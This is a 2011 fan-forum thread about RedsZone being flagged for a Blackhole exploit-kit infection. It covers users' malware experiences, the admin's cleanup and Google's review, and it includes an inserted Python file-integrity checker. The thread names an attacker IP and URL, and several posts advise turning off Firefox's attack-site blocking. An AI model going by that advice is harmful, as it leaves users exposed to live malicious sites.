RedsZone Malware Attack Discussion



jojo
05-15-2011, 06:12 PM
I'm a Firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

RBA
05-15-2011, 06:16 PM
I'm a Firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

It's happening to me. I had to use IE to respond to this post.

HalMorrisRules
05-15-2011, 06:22 PM
I'm a Firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

Yes, my guess would be that bitter Card fans have reacted in some childish way resulting in RZ being flagged.

top6
05-15-2011, 06:22 PM
It's happening to me. I had to use IE to respond to this post.

Exact same thing just happened to me, and I did the exact same thing.

It happened very recently, as I posted probably an hour ago or so.

_Sir_Charles_
05-15-2011, 06:28 PM
Just now got the same thing.


Reported Attack Page!

This web page at www.redszone.com has been reported as an attack page and has been blocked based on your security preferences.

Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system. Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.


Norton has this....

Web Attack: Blackhole Toolkit Website 6
Attacking Computer: 65.75.129.139, 80
Attacker URL: 65.75.129.139/Home/index.php

The attack was resulted from \DEVICE\HARDDISKVOLUME1\PROGRAM FILE\INTERNET EXPLORER\IEXPLORE.EXE

pahster
05-15-2011, 06:38 PM
I'm a Firefox browser user and redszone has been getting flagged as an attack site. This just started this afternoon. Is anyone else experiencing the same thing?

I'm getting a warning in Chrome.

Boss-Hog
05-15-2011, 06:39 PM
Yes, my guess would be that bitter Card fans have reacted in some childish way resulting in RZ being flagged.
That's my guess...I have reported the problem to our host. I will keep you posted as soon as I hear anything.

foxfire123
05-15-2011, 06:42 PM
Anyone else getting Google Attack site warnings when they try to read RedsZone? I've been getting them for the past half hour or so. Tried to PM Boss Hog to ask about it but the pop-ups are stopping any messages. Or at least it looks like it; Boss may have gotten 2 messages and they're just not showing in my PM Sent folder. Had a non-member friend try and load the site, and he's getting the same message. Both of us use Firefox.

I turned off my "block attack sites" security setting, hopefully it lets me post this time. This is the second attempt at posting a new topic. I'm running Comodo also to make sure nothing's infected, but I think it's more a nuisance reporting of the site than anything actually wrong.

PMand JM
05-15-2011, 06:43 PM
Just started getting them in the past 30 min.

Brutus
05-15-2011, 06:44 PM
I too am getting a malware warning from Chrome when I visit. And if the context helps... the warnings began almost immediately after getting some server error messages about an hour ago, which was prohibiting the site from loading and instead giving query errors.

BigJohn
05-15-2011, 06:45 PM
I only get it when using Mozilla, not Internet Explorer.

Vottomatic
05-15-2011, 06:46 PM
I use Explorer and I'm not getting them.

jimbo
05-15-2011, 06:46 PM
I started getting them also. I'm also using Firefox and turned off the "block attack sites" setting and am accessing the site fine now.

BigJohn
05-15-2011, 06:47 PM
Better stay off the porn sites then, LOL!!!:lol:

OesterPoster
05-15-2011, 06:48 PM
I bet Chris Carpenter's son did it.

Actually, the first attack message I got was at exactly 6:30. I had clicked through 3 pages of the Cordero vs. Cards thread, and got the error when clicking onto the 4th page.

foxfire123
05-15-2011, 06:50 PM
I started getting them also. I'm also using Firefox and turned off the "block attack sites" setting and am accessing the site fine now.

Yeah, I'm ok now that I turned off the block, but I'm not comfortable LEAVING it turned off.

I'm sure now that Boss and the other admin folks know, they'll check into it.

CrackerJack
05-15-2011, 06:55 PM
Getting a malware warning in Chrome also here.

Stray
05-15-2011, 07:04 PM
Yep I just started getting them. Turned off the option to block them but like foxfire, I don't really wanna leave it off.

I wonder who reported this as a sketchy site lol.

RedsMan3203
05-15-2011, 07:10 PM
Just got a Malware warning from Google Chrome....

mikdavrut
05-15-2011, 07:10 PM
I left my comp. running yesterday (Sat.) about 30 min. prior to the ballgame (I left to watch the game w/a friend) and Redszone was the only page I was on (running iexplorer). When I came home from the game, it was sometime close to 7 or maybe even a bit after 7. Well my comp. was ALL messed up. I kept getting popups saying that I was having "critical HD failure." ALL my files disappeared (as though the HD had crashed) but oddly enough, I could still browse the net. So I KNEW it had to be some kind of malware. The following would popup about every 25 seconds (close it out, it would continuously pop back up every 25 sec. or so): "system detected problems with one or more installed IDE/SATA hard disks"

And some supposed "scanner" stayed popped up (couldn't minimize nor x it out, could only "move it" to the bottom of my screen so I could see). It kept "appearing" to "scan" my system and found 5 "critical failures" with my HD, and it supposedly "fixed" 6. *ETA - it kept wanting me to "buy" the "advanced" version which would "fix" the "critical failures" that this basic vs. of the scanner could not fix - ie - it just wanted my CC info, so if anyone else out there happens to become infected w/this or anything remotely like it - DO NOT GIVE OUT YOUR CC INFO!!!! I'm sure most of you are smart enough to already know this but just in case!! - end of edit*

So I did some googling and typed into google that "system detected problems" msg. I kept getting and sure enough, it was malware. So I had to run a "kill" prog. to kill off the scanner and the several annoying "system failure" msgs. I kept having popping up. That got rid of that annoying crap. Then I ran Malwarebytes and it found I think 4 infections, and I deleted those. Downloaded "Hijack This" and did a scan but I don't understand what it "finds" and I'm afraid to take any action until someone can look at the log it gave me and let me know what's bad and what's not (cause I KNOW I still have nasties in my system - every now and again I'll hear advertisements when the page I'm on, which has been this one for the last hour or so does not appear to have any "running ads" only static ones. There's also 2 iexplorer.exe running in my task mgr. when I only have one running - so there's DEF. still some problems in my system, but luckily I got rid of the worst of it and I can use my comp. quite normally for now - but I GOT to get these nasties off of my system).

Oh yeah, after using the Mbytes and deleting what it found, I had to use unhide.exe to get my files to "show back up" (this malware prog. makes all your files appear to be "gone" so you think your HD has totally screwed up).

I don't KNOW that I got anything from Redszone and I'm not saying that I did, but it was the ONLY page I left up when I left to go watch the game and when I came back, that crap immediately started, and now you guys are getting some odd msg.? I don't know. It's something that it sure wouldn't hurt to look into. I have NEVER had anything like what I had infect my system last night, man, it was a NASTY infection. In Google searches, it seems to (whatever it was that I had) be REALLY going around right now though as most of the searches that showed up for me were from like March and on from this year. I think some ppl. have gotten it after visiting MySpace pages while others say they got it after visiting Facebook, etc. etc. So like I said, I'm not saying I got it from here, just that it's something that might be worth looking into if others are getting a "threat" type msg.

Chris Sabowned
05-15-2011, 07:16 PM
I just got them too. Kinda sketchy.

jwittenmyer
05-15-2011, 07:23 PM
Seeing it too. It's from an infected ad that's running on the site. The ad is probably in rotation so you won't see it all the time. However, the site has been flagged by Google as a source of malware. That's why you're getting the warning from Chrome and Firefox. The site admins need to figure out which ad it is and contact their ad provider to have it removed.

paintmered
05-15-2011, 07:29 PM
Ditto on the malware warning for me too.

Boss-Hog
05-15-2011, 07:54 PM
My host has responded and has asked for permission to run a full malware scan, which I gave approval. I will keep you posted as soon as they reply back.

SirFelixCat
05-15-2011, 08:09 PM
Boss, please remove all ads until it's determined which is causing said malware detection.


Thanks.

kaldaniels
05-15-2011, 08:34 PM
In all seriousness are we thinking Card fans did this?

Boss-Hog
05-15-2011, 08:44 PM
In all seriousness are we thinking Card fans did this?
Unknown at this point...it's certainly possible or it could be a "false positive".

Boss-Hog
05-15-2011, 08:50 PM
Boss, please remove all ads until it's determined which is causing said malware detection.


Thanks.
Good suggestion - I just tried that and confirmed it's not the ads, as I receive the same message with ads disabled.

RedsManRick
05-15-2011, 09:52 PM
Could somebody have made a post with an offending URL? Maybe you can take a look at posts made by new users or with few posts?

Joseph
05-15-2011, 10:07 PM
That's a strong possibility Rick, as is any photo posted.

Boss-Hog
05-15-2011, 10:13 PM
Could somebody have made a post with an offending URL? Maybe you can take a look at posts made by new users or with few posts?

Possibly, but that shouldn't knock out the entire site, right? Our host is running the malware scan now and will let us know the results once it's complete.

jhiller21
05-15-2011, 10:34 PM
I'm guessing some cards fan reported the site. If that's the case, real classy...

mikdavrut
05-16-2011, 12:15 AM
I posted what happened to my computer after leaving Redszone up & running for about 4 - 5 hours in the SunDeck forum. NO CLUE if it actually happened due to Redszone, but I spent 4 - 5 hours last night getting rid of a bunch of malware, then today noticed that I had a "redirect" trojan/virus/whatever (in other words when doing any search engine searches, when I would click on the results, I would immediately be redirected to a fake page). Took me FOREVER to get rid of it (finally got rid of it about 30 min. ago, if that and started trying around 6 this evening). Finally found a program called Hitman Pro that did the trick the SECOND time I did a scan w/it (I think I made a mistake while deleting the stuff that it found after the first scan). I tried everything minus the kitchen sink (prog. after prog. after prog.) and though they ALL found crap like cookies and non-major threats, the 2nd scan with the Hman FINALLY appears to have found the offender (crossing my fingers).

Like I said, I'm not blaming Redszone, but it IS weird that I got this infection somewhere between the start of Sat. game and the games conclusion and this is the site I was on (and left on) while I was away watching the game, and it appears that between that same time period and throughout Sunday, all these users are getting these "attack" notifications/warnings. Factually, all I know is that Pre-game Sat., no computer/internet problems....post game, TONS of problems, malware up the butt. And HOURS of work getting rid of everything (IF I even HAVE gotten rid of everything, I sure am hoping - at least I appear to have gotten rid of the worst of it).

Boss-Hog, I'll be really interested in what you find out after your host does/completes their malware scan. Everyone else, just be cautious and if anyone DOES end up having problems and you need some help, PM me, I check RZ daily and believe me, I learned a TON while trying a TON of things getting my crap back to normal, so maybe I can save you a ton of time. Hopefully noone else will have any problems though!

CrackerJack
05-16-2011, 12:39 AM
I'm having no problems with any sort of warnings for malware from Avast. Someone either hacked the site and inserted code with a false positive, or someone clicked on a bad ad and reported, or their browser reported, that it was infected as a result of clicking the link or downloading something.

Sounds like it is not a big deal, just a warning that needs to be removed.


Google's results help shed some light on it I think:

Diagnostic page for redszone.com

What is the current listing status for redszone.com?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 7 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-05-15, and the last time suspicious content was found on this site was on 2011-05-15.
Malicious software includes 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 1 domain(s), including 65.75.129.0/.

This site was hosted on 1 network(s) including AS40244 (TURNKEY).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, redszone.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of

mikdavrut
05-16-2011, 01:05 AM
I'm having no problems with any sort of warnings for malware from Avast. Someone either hacked the site and inserted code with a false positive, or someone clicked on a bad ad and reported, or their browser reported, that it was infected as a result of clicking the link or downloading something.

Sounds like it is not a big deal, just a warning that needs to be removed.


Google's results help shed some light on it I think:

If it's just a false warning, then it must just be a complete coincidence that this site had anything at all to do with the problems I experienced, I just thought the timing was odd, seeing as I "appeared" to have become infected sometime during the Reds/Cards game Sat. and between that time and Sun. seems to be when users of this site began experiencing the "warnings".

Let me add that I am one of those morons that always lets their antivirus expire and then basically runs their computer unprotected. I have purchased 4 new computers since 2006, done the same with all of said computers and have NEVER had any infections, etc. (just getting rid of tracking cookies, etc. via running ad-aware or programs of that ilk). Yesterday's malware infection was my first time experiencing such a thing. So I could have picked it up somewhere else and it just chose to "show itself" after the game yesterday.

So yeah, this site may very well have nothing wrong with it at all, I just wanted to report the problems I experienced after reading that others were getting the warnings. As I mentioned in a previous post on the matter, this particular form of malware seems to be going around like hotfire in the past 3 - 5 months or so.

CrackerJack
05-16-2011, 01:30 AM
If it's just a false warning, then it must just be a complete coincidence that this site had anything at all to do with the problems I experienced, I just thought the timing was odd, seeing as I "appeared" to have become infected sometime during the Reds/Cards game Sat. and between that time and Sun. seems to be when users of this site began experiencing the "warnings".

Let me add that I am one of those morons that always lets their antivirus expire and then basically runs their computer unprotected. I have purchased 4 new computers since 2006, done the same with all of said computers and have NEVER had any infections, etc. (just getting rid of tracking cookies, etc. via running ad-aware or programs of that ilk). Yesterday's malware infection was my first time experiencing such a thing. So I could have picked it up somewhere else and it just chose to "show itself" after the game yesterday.

So yeah, this site may very well have nothing wrong with it at all, I just wanted to report the problems I experienced after reading that others were getting the warnings. As I mentioned in a previous post on the matter, this particular form of malware seems to be going around like hotfire in the past 3 - 5 months or so.

If your PC had a virus/malware while you were on or posting on RZ, then it's possible it was detected, certain browsers picked it up (RZ uses Google ads, Chrome is clearly showing a warning message), so yeah probably something pretty minor. Awful sensitive security measures from Google or the host or someone though, not sure. Did you click on any of the Google ads, either by accident or not?

I don't think your original post accused RZ of anything, always good to bring that kind of thing to their attention (your PC was clearly infected at the time).

mikdavrut
05-16-2011, 02:03 AM
If your PC had a virus/malware while you were on or posting on RZ, then it's possible it was detected, certain browsers picked it up (RZ uses Google ads, Chrome is clearly showing a warning message), so yeah probably something pretty minor. Awful sensitive security measures from Google or the host or someone though, not sure. Did you click on any of the Google ads, either by accident or not?

I don't think your original post accused RZ of anything, always good to bring that kind of thing to their attention (your PC was clearly infected at the time).

To be fair, Fri. night/early AM Sat., I DID visit a MySpace site and I remember back when I used to actually use MySpace I had a few minor problems with some prog. "appearing" to be doing a "scan" and finding "problems" - though it never appeared to have ever infected my computers or anything. But, when I visited that MS site, that was the 1st time I had been on MS in a LONG time (I long ago gave up on/quit using MS as I just think it completely went down the crapper with all the changes they made in the last yr. or two, plus Fbook is just so much better for that kind of thing). I just happened to remember that I had visited that MS page very briefly so it's VERY possible I picked it up from there. The only other site I visited previous to that happening was my Facebook profile, and though I don't think it's likely, it COULD have been picked up there as well. I HAVE read of others complaining about picking up malware via Facebook as of late.

So yeah, I def. was not blaming Redszone as I actually thought it was very unlikely that I would pick up malware from here, but I DID think it was kind of ironic that other users began getting those warning msgs. at that very same range in time.

And no, I'm nearly positive that I did NOT click on any of the ads on this site, if I did do so, it was by complete accident and I didn't notice doing so.

Oh well, hopefully I finally got rid of all the offenders on my PC and this whole mess is over with for me. I do look forward to reading what Boss-Hog gets reported back to him concerning the site hosts malware scan. Hopefully it is indeed nothing.

The ONLY problem I have personally ever experienced w/RedsZone is it does tend to go VERY slowly quite often as of late (not sure why, this just started within the past month or two for me personally, main problem being that it made it very difficult to participate in a timely manner to "game threads" - by the time I could get my post up, the play was long over and my reply was about as worthless as could be :laugh: ).

Oh well, like you said, it's prob. absolutely nothing to do w/this site and I was almost assuredly already infected.

jojo
05-16-2011, 02:05 AM
The ONLY problem I have personally ever experienced w/RedsZone is it does tend to go VERY slowly quite often as of late (not sure why, this just started within the past month or two for me personally, main problem being that it made it very difficult to participate in a timely manner to "game threads" - by the time I could get my post up, the play was long over and my reply was about as worthless as could be :laugh: ).

That couldn't have happened to you more than maybe.... twice?

mikdavrut
05-16-2011, 02:09 AM
That couldn't have happened to you more than maybe.... twice?

Well, no (I think you're judging by my post count) - I have posted on this site more than what my post count appears to show. I have no clue why I'm just showing to have like 5 or 6 posts? I'm thinking that when you make a post in a "game thread" it does not count towards your post count (at least, any and every post I have made in any game threads have NOT added to my post count).

But, to be fair to what you are saying, I have not posted often in game threads. I was going to start, but the problems with the lag during the last game thread I attempted to participate in were so bad, I just gave up. My last attempt to post in a game thread was prob. a month or so ago. I now forget which series it was.

Maybe I will try again soon as, in the past week or so, RZ seems to be running more smoothly for me.

*ETA - I've also noticed that posts to this forum also do not count towards post count, or at least have not been for me, so I'm assuming that is correct. *

Ron Madden
05-16-2011, 06:50 AM
I had problems with the site yesterday. I logged off of RedsZone then logged back in and it seems to have helped.

Boss-Hog
05-16-2011, 07:25 AM
All,

As an update, my host finished the malware scan and found one problematic file, which I removed. I also replaced one of the vBulletin files mentioned in this thread with the original. The warning message we're receiving from Google does not magically go away after the malware is (hopefully) removed; instead, you have to submit a request for them to review your site and if it's determined to be clean, they will take down the message. I've requested they review the site and will continue to keep you all posted in this thread. Thanks for your patience...believe me, this is very frustrating from my end, too.
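Boss-Hog's update (one problematic file found by the host's scan, one vBulletin file replaced with the original) is exactly the situation a baseline file-integrity check is meant to surface. The following Python is an added example and not RedsZone's or vBulletin's code: the directory layout, file names and the "injected marker" are constructed placeholders, and in practice the baseline manifest would be built from a fresh download of the same vBulletin version and kept off the web host.

```python
"""Baseline-vs-current file integrity check for a web application install.

Added example (not RedsZone's or vBulletin's code). All paths and contents
below are constructed placeholders, not real vBulletin file names.
"""
import hashlib
import json
import tempfile
from pathlib import Path

CHUNK = 1 << 16  # read files in 64 KiB pieces so large attachments do not load into memory


def sha256_of(path: Path) -> str:
    """Return the SHA-256 hex digest of one file."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(root).as_posix()] = sha256_of(p)
    return manifest


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences between a trusted baseline and the live tree.

    modified: shipped file whose hash changed (injected code, replaced file)
    added:    file the clean install never had (dropped web shell, stray upload)
    missing:  shipped file that has disappeared
    """
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "missing": sorted(k for k in baseline if k not in current),
    }


def write_tree(root: Path, files: dict) -> None:
    """Create the given relative-path -> bytes files under root."""
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)


def demo() -> dict:
    """Constructed scenario: snapshot a clean install, then detect tampering."""
    clean = {  # constructed stand-ins for a forum install, not real vBulletin files
        "index.php": b"<?php // constructed front controller\n",
        "includes/sample_lib.php": b"<?php // constructed library file\n",
        "images/logo.gif": b"GIF89a\x00\x00",
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        write_tree(root, clean)
        # The baseline would normally be built from a fresh vendor download and
        # stored away from the web host so an intruder cannot rewrite it too.
        baseline_json = json.dumps(build_manifest(root), indent=2, sort_keys=True)

        # Simulate the kind of compromise described in the thread: one shipped
        # file altered in place, one unexpected file dropped, one file removed.
        lib = root / "includes/sample_lib.php"
        lib.write_bytes(clean["includes/sample_lib.php"] + b"// constructed injected marker\n")
        write_tree(root, {"cache/dropped_example.php": b"<?php // constructed unexpected file\n"})
        (root / "images/logo.gif").unlink()

        report = compare(json.loads(baseline_json), build_manifest(root))
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Anything listed under "modified" or "added" is what to hand to the host for inspection and what to restore from the vendor package; a clean comparison after restoration is also the evidence to attach to the Google review request.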

Reds
05-16-2011, 07:38 AM
Thanks for the update.

Reds
05-16-2011, 07:47 AM
I also want to post how to turn this warning system off for Firefox. Please note that doing this will disable malicious warnings for every website and not just redszone.com.

Go to Tools > Options > Security > Uncheck 'block reported attack sites' > OK

mikdavrut
05-16-2011, 08:02 AM
All,

As an update, my host finished the malware scan and found one problematic file, which I removed. I also replaced one of the vBulletin files mentioned in this thread with the original. The warning message we're receiving from Google does not magically go away after the malware is (hopefully) removed; instead, you have to submit a request for them to review your site and if it's determined to be clean, they will take down the message. I've requested they review the site and will continue to keep you all posted in this thread. Thanks for your patience...believe me, this is very frustrating from my end, too.

Boss-Hog, was it at all possible that the malware my computer became infected with could have possibly come from Redszone? I'm just curious (not upset about it or anything like that, I'm just trying to pinpoint exactly where I DID get infected more than anything else). You mentioned there was one problematic file found, so I'm just curious as to if it WAS at least possible or not? My main suspect is a MySpace page I viewed sometime around 1 - 2AM Sat. morning. But if it WAS that page, I'm curious as to why the infection did not show up until sometime around 6 or 7PM Sat. evening.

Like I said, just trying to narrow the possibilities down.

Thanks a lot and I hope everything gets easily resolved for you!

Boss-Hog
05-16-2011, 08:29 AM
Boss-Hog, was it at all possible that the malware my computer became infected with could have possibly come from Redszone? I'm just curious (not upset about it or anything like that, I'm just trying to pinpoint exactly where I DID get infected more than anything else). You mentioned there was one problematic file found, so I'm just curious as to if it WAS at least possible or not? My main suspect is a MySpace page I viewed sometime around 1 - 2AM Sat. morning. But if it WAS that page, I'm curious as to why the infection did not show up until sometime around 6 or 7PM Sat. evening.

Like I said, just trying to narrow the possibilities down.

Thanks a lot and I hope everything gets easily resolved for you!
This is not really my area of expertise, but yeah, I suppose it's possible - particularly if your virus updates were out of date, as you mentioned. I'm not positive from your posts, but if it occurred on Saturday, then I'm pretty confident that it did not come from RZ since no one was aware of any related problems until yesterday (Sunday) afternoon; if it occurred yesterday, then it is definitely possible. If the latter, I'm not saying 100% for sure that's what caused the problem, but as best I can tell, it's possible, though I've not heard of anyone else that has been infected by this. Others that are more knowledgeable in this area can probably better assist you, though.

Mario-Rijo
05-16-2011, 11:25 AM
All,

As an update, my host finished the malware scan and found one problematic file, which I removed. I also replaced one of the vBulletin files mentioned in this thread with the original. The warning message we're receiving from Google does not magically go away after the malware is (hopefully) removed; instead, you have to submit a request for them to review your site and if it's determined to be clean, they will take down the message. I've requested they review the site and will continue to keep you all posted in this thread. Thanks for your patience...believe me, this is very frustrating from my end, too.

I'll be waiting patiently, err I'll try to wait patiently. Until then I will use IE for RZ alone.

KittyDuran
05-16-2011, 11:35 AM
I'll be waiting patiently, err I'll try to wait patiently. Until then I will use IE for RZ alone.

Well it attacked my computer here at work... and my boss is still working on it... :(

Boss-Hog
05-16-2011, 11:42 AM
My host confirmed that it's an attack they've seen before with this version of vBulletin. While it's not the latest and greatest, 3.8.7 that we're running is the latest 3.X version and we have all patches and so forth installed. We'd been reluctant to upgrade to 4.X until we're able to confirm that all our custom code/enhancements are ported over to 4.X. I have followed up with vBulletin to figure out 1). how to address the problem if the steps I've taken above have not already done so after Google reviews the site and 2). what we need to do to prevent this from ever happening again. Thanks again for your patience...in light of Kitty's post above this one, I'd definitely say visit with extreme caution (if you must) until I confirm we're 100% good to go.

powersackers
05-16-2011, 02:05 PM
These trojans are a terrible fact of web browsing these days. Most are a painful yet quick fix.

1) Have a copy of Rkill.exe (available on the net) and MalwareBytes or HiJackThis installed on your PC or a USB drive
2) As soon as you get the pop ups / scanners / alerts shut down your PC with the start>shutdown or power off button
3) Boot into safe mode, put rkill.exe into C:\Users\your username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs - You have to enable viewing of hidden folders and files to see this location in explorer
4) Reboot into normal windows
5) Run the MalwareBytes or HiJackThis program allowing it to update itself first.
6) Remove Rkill.exe from that folder, keeping it somewhere safe for next time

You'll be back to normal.

LoganBuck
05-16-2011, 02:14 PM
Malware attack message no longer showing up for me. I am running Firefox 4

cinreds21
05-16-2011, 02:19 PM
Malware attack message no longer showing up for me. I am running Firefox 4

Same here. I'm on Chrome.

Boss-Hog
05-16-2011, 03:11 PM
Malware attack message no longer showing up for me. I am running Firefox 4

Good to hear...that MAY mean Google analyzed the site and it's no longer currently a threat. I'll be able to confirm when I get home.

_Sir_Charles_
05-16-2011, 04:04 PM
Malware attack message no longer showing up for me. I am running Firefox 4

Same here. Looks good to go Boss. :clap:

Boss-Hog
05-16-2011, 05:10 PM
From Google:


Status of the latest badware review for this site: A review for this site has finished. The site was found clean. The badware warnings from web search are being removed. Please note that it can take some time for this change to propagate.

Now I have to do my part to ensure something like this never happens again. Unfortunately, I'm 95% sure the problem was not something on our end that is easy to fix, and if I'm right, there's going to be a good amount of work for us to make sure this is the first and only attack of its kind. Thanks again for everyone's patience.

KittyDuran
05-16-2011, 06:27 PM
Well it attacked my computer here at work... and my boss is still working on it... :(

My boss worked as much as he could with it but in the end he just went and purchased a new HD since mine was about 6 years old.

jojo
05-16-2011, 06:34 PM
My boss worked as much as he could with it but in the end he just went and purchased a new HD since mine was about 6 years old.

Just as a tip, download Malwarebytes (free) and keep it updated. Between it and a good virus program (I use Sophos), you guys should be mostly covered. If you do get a nasty malware program, just go into safe mode and run Malwarebytes and it will usually fix your problem in about 5 minutes...

Boss-Hog
05-16-2011, 07:02 PM
Just as a tip, download Malwarebytes (free) and keep it updated. Between it and a good virus program (I use Sophos), you guys should be mostly covered. If you do get a nasty malware program, just go into safe mode and run Malwarebytes and it will usually fix your problem in about 5 minutes...

I second this advice (though I use Avast as my antivirus software).

MikeThierry
05-16-2011, 10:11 PM
Does anyone have any idea how this malware attack happened?

KronoRed
05-16-2011, 10:28 PM
Does anyone have any idea how this malware attack happened?

Get ready for some paranoid blame to be thrown your way ;)

Tony Cloninger
05-16-2011, 10:56 PM
I was at my parents. I was browsing the site and on accident clicked an advertisement......and then it was like a mess. Virus this and that. Computer wiped out all my parents info.

Here I am....a 40 year old man getting yelled at by his parents...."BUT it wasn't porno that I was looking at, Mom!"

I have an Apple and they warn you NOT to go into this site...lest you be infected by a Malware Attack.

Screwball
05-16-2011, 11:56 PM
Get ready for some paranoid blame to be thrown your way ;)

I have no idea if a Cardinals fan attacked the site or not, but I don't think it's unreasonable to suspect that it was. In fact I'd say that's more being logical than paranoid.

MikeThierry
05-17-2011, 03:32 AM
I have no idea if a Cardinals fan attacked the site or not, but I don't think it's unreasonable to suspect that it was. In fact I'd say that's more being logical than paranoid.

It's not unreasonable, yet at the same time, to jump to conclusions about it would be folly as well. I have been a member of other forums in the past that have had malware attacks simply because it is a hacker at the other end just playing a game. This is a rather popular forum so it could be any number of people.

Boss-Hog
05-17-2011, 06:40 AM
It's not unreasonable, yet at the same time, to jump to conclusions about it would be folly as well. I have been a member of other forums in the past that have had malware attacks simply because it is a hacker at the other end just playing a game. This is a rather popular forum so it could be any number of people.
That's all true, but without getting into details, what I do know at this point is that if something was secured properly (outside of our control), this all is a non-issue.

Mario-Rijo
05-17-2011, 08:38 AM
Well it attacked my computer here at work... and my boss is still working on it... :(

Ouch, that's no good. Sorry to hear it. My Boss would likely have a major meltdown, we are very big on security and we aren't supposed to be surfing.

KittyDuran
05-17-2011, 09:42 AM
Ouch, that's no good. Sorry to hear it. My Boss would likely have a major meltdown, we are very big on security and we aren't supposed to be surfing.

It wasn't a problem since I was surfing on Saturday before going to the game... And I sent him an email from my iPhone right then so he would have a heads-up.

Boss-Hog
05-17-2011, 11:23 AM
It wasn't a problem since I was surfing on Saturday before going to the game... And I sent him an email from my iPhone right then so he would have a heads-up.
So it sounds like this happened on Saturday? If so, I'm not positive the attack was from this site - not saying it couldn't be, but everything I've seen indicated Sunday or later would've been the days to cause a potential infection. Regardless of whether it was due to this site or not, I'm sorry to hear about it, Kitty.

smith288
05-17-2011, 03:19 PM
DON'T USE IE. Especially the older versions. Horrible, horrible browser.

smith288
05-17-2011, 03:20 PM
I was at my parents'. I was browsing the site and by accident clicked an advertisement......and then it was like a mess. Virus this and that. Computer wiped out all my parents' info.

Here I am....a 40 year old man getting yelled at by his parents...."BUT it wasn't porno that I was looking at, Mom!"

I have an Apple and they warn you NOT to go into this site...lest you be infected by a Malware Attack.
If you have an Apple, how did you get malware installed?

Boss-Hog
05-17-2011, 04:43 PM
If you have an Apple, how did you get malware installed?
I think he's saying he has an Apple, but he was at his parents when it happened and they presumably do not have an Apple.

Tony Cloninger
05-17-2011, 04:45 PM
If you have an Apple, how did you get malware installed?

Parents do not have an Apple......they have a computer that gets more viruses than the Middle Ages and always seems to have a problem with anything.

mikdavrut
05-18-2011, 12:22 AM
So it sounds like this happened on Saturday? If so, I'm not positive the attack was from this site - not saying it couldn't be, but everything I've seen indicated Sunday or later would've been the days to cause a potential infection. Regardless of whether it was due to this site or not, I'm sorry to hear about it, Kitty.
It happened to me on Sat. as well. Like I mentioned, I left my browser open, computer running & was on this site, then left for a friend's house to watch the game and when I came back home, it got NASTY. Sounds like this other person got infected close to game time as well, just like I did? I'm pretty sure the attack/malware definitely came from this site and happened on Sat. Might not have gotten the warnings until Sunday, but the attacks seem to have actually taken place/started right before/around/during gametime on Sat.

Hopefully everything is good now. That was one NASTY piece of malware; even after doing all of the RKill/Malwarebytes/etc. runs, it finally took 2 uses of Hitman Pro to get rid of the Google redirect (it redirects ALL search engine hits to fake sites unless you use the "cache" option, which was the only way I could search the web and figure out exactly how to get rid of all of this crap).

Oh yeah, to the person who says their parents' comp. is completely wiped out, it's NOT. You need to get rid of the malware and use unhide.exe. It made ALL my files disappear as well as my desktop icons...everything. This particular malware hides all of your files so that it will appear as though your HD has failed. Those files are still there (just "hidden" by the malware), so hopefully your parents haven't gone out and paid for a new computer or anything like that.

Boss-Hog
05-18-2011, 06:48 AM
If the attack did indeed come from this site, which is definitely possible, I sincerely apologize, even though I've confirmed it was through no fault of our own (meaning GIK and I). I should mention that there were plenty of others that visited the site during the same time period (including myself, against my better judgement, in order to try to fix the problem) and were not infected. In the above poster's case, not keeping your antivirus and anti-malware programs up to date and running regular scans makes you much more susceptible to a situation like this - whether that be on RedsZone or anywhere else on the internet. Again, I'm not saying this is in any way your fault, but that would be my takeaway from this experience.

Mario-Rijo
05-18-2011, 09:24 AM
So Boss, as far as you can tell, was it an infection here or just a false alarm? I can't figure out if I need to take any steps here. I don't appear to be having any problems, just had that darn message continuously pop up every time I clicked on a link here.

mikdavrut
05-18-2011, 09:33 AM
If the attack did indeed come from this site, which is definitely possible, I sincerely apologize, even though I've confirmed it was through no fault of our own (meaning GIK and I). I should mention that there were plenty of others that visited the site during the same time period (including myself, against my better judgement, in order to try to fix the problem) and were not infected. In the above poster's case, not keeping your antivirus and anti-malware programs up to date and running regular scans makes you much more susceptible to a situation like this - whether that be on RedsZone or anywhere else on the internet. Again, I'm not saying this is in any way your fault, but that would be my takeaway from this experience.

Boss-Hog, please don't think in ANY way whatsoever that I blame you or RedsZone for this...it isn't you guys' fault whatsoever. It's just one of those things that happens. And yes, me not keeping my antivirus, etc. up-to-date and running made me EXTREMELY susceptible. I was actually thinking I might not have gotten it from RZ, but 3 ppl. who all seemed to become infected the same day/around the same time makes me almost 100% certain that it came from here. I think it's just too much of a coincidence to think otherwise.

But once again, it's NOT your fault and I'm NOT upset w/you or w/RedsZone....nothing like that at all. So no need for you to apologize about it, Boss! :beerme:

